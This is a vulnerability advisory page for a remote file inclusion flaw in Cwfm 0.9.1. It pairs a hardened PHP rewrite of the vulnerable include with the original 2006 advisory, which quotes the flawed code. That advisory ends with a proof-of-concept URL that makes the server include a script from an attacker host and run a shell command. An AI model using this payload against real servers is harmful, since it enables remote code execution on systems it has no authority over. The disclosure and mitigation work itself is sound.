Vendor: Cwfm
By: Philipp Niedziela
CVSS: 7.5 (HIGH)
CWE: 98 (Remote File Inclusion)
Product Name: Cwfm
Affected Version From: 0.9.1
Affected Version To: 0.9.1
Patch Exists: NO
Related CWE: N/A
CPE: a:cwfm:cwfm:0.9.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2006

Cwfm-0.9.1 (Language) Remote File Inclusion

Cwfm 0.9.1 is vulnerable to Remote File Inclusion in /CheckUpload.php. The $Language variable is not properly sanitized before being used, allowing an attacker to include a remote file and execute arbitrary code on the vulnerable server.

Mitigation:

Declare $Language before using it, include the configuration file, or deny direct access to the vulnerable file.
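The following is an added example, not Cwfm's own code, showing how the include at the heart of this advisory can be hardened along the lines of the mitigation above: the variable is declared explicitly from the request instead of relying on register_globals, it is checked against a fixed allowlist before it is ever interpolated into a path, and direct access to the file is refused. It assumes language files live under lang/ (as on the commented-out line in the advisory) and that the application's entry script defines a hypothetical CWFM_ENTRY constant before including this file.

```php
<?php
// Added example (not Cwfm's code): hardened replacement for
//     include_once("$Language.php");
// Assumes language files are lang/en.php, lang/de.php, lang/fr.php
// and that the entry script defines CWFM_ENTRY (hypothetical name).

// Only identifiers in this allowlist can ever reach the include.
const ALLOWED_LANGUAGES = ['en', 'de', 'fr'];
const DEFAULT_LANGUAGE  = 'en';

/**
 * Map the requested language to a local file path.
 * Anything that is not exactly an allowlisted identifier (a URL,
 * a traversal sequence, an empty value) falls back to the default,
 * so no attacker-controlled string is ever interpolated into the path.
 */
function resolveLanguageFile($requested, string $langDir): string
{
    $lang = is_string($requested) ? $requested : DEFAULT_LANGUAGE;

    // Strict comparison: no type juggling, no partial matches.
    if (!in_array($lang, ALLOWED_LANGUAGES, true)) {
        $lang = DEFAULT_LANGUAGE;
    }

    return rtrim($langDir, '/') . '/' . $lang . '.php';
}

// Deny direct access: this file should only run via the entry point,
// which is assumed to define CWFM_ENTRY before including it.
if (!defined('CWFM_ENTRY')) {
    http_response_code(403);
    exit('Direct access denied');
}

session_start();
include_once 'Global.php';

// Declare the variable explicitly from the request; never let
// register_globals populate it. Defence in depth: keep
// allow_url_include=Off in php.ini so a remote URL cannot be
// included even if a future bug reintroduces a tainted path.
$languageFile = resolveLanguageFile($_GET['Language'] ?? null, __DIR__ . '/lang');
include_once $languageFile;
```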

Exploit-DB raw data:

+--------------------------------------------------------------------
+
+ Cwfm-0.9.1 (Language) Remote File Inclusion
+
+ Original advisory:
+
+ http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Remote_File_Inclusion.htm
+
+--------------------------------------------------------------------
+
+ Affected Software .: Cwfm 0.9.1
+ Vendor ............: http://cwfm.sourceforge.net/
+ Class .............: Remote File Inclusion in /CheckUpload.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+                      http://www.bb-pcsecurity.de
+
+--------------------------------------------------------------------
+
+ Code /CheckUpload.php
+
+ .....
+ session_start();
+ include_once("Global.php");
+ //include_once("lang/$Language.php");
+ include_once("$Language.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $Language is not properly sanitized before being used.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Declare $Language before using, include config-file or
+ deny direct access to the vuln file.
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/CheckUpload.php?Language=http://evilsite.com/dblib.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Note:
+ Vendor contacted, but no response. So do a dirty patch.
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-08-08]